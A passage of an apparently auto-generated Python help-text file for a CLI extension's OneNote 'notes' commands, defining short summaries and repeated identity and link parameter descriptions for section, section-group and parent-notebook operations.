The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSection for sites" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from sites" """ helps['notes get-parent-section'] = """ type: command short-summary: "Get parentSection from sites" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section'] = """ type: command short-summary: "Update the navigation property parentSection in sites" """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for sites" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for sites" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in sites" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for sites" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for sites" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from sites" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from sites" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in sites" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for sites" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for sites" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in sites" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for sites" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for sites" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from sites" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from sites" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in sites" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for sites" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for sites" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when 